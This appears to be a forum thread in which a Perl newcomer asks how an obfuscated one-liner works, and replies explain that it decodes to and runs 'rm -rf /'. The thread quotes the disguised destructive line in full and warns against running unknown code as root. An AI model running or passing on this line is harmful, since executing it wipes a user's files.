Hello, I'm new to Perl and I was wondering if someone could explain me how does the following line of code work:

$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/[-`{-};`-{/" -;;s;;$_;see

Thanks, excellent reference-- but how does it get from a state where: $_ = '=]=>%-{<-\|}<&\|`{' [download] to `$_ = 'system"rm -rf/"'` [download] using only the following statement: y; -/:-@[-`{-};`-{/" -;; [download] Doesn't tr/// require the destination characters to be included in the mapping? I don't see any alphanumerics in there at all.	[reply] [d/l] [select]

For those people too lazy to click on marto's link, I'll spell it out in full: the code executes `rm -rf /` [download] Which just goes to show you shouldn't run random stuff as root (which was probably the point, albeit stated in a brutal manner). • another intruder with the mooring in the heart of the Perl	[reply] [d/l]
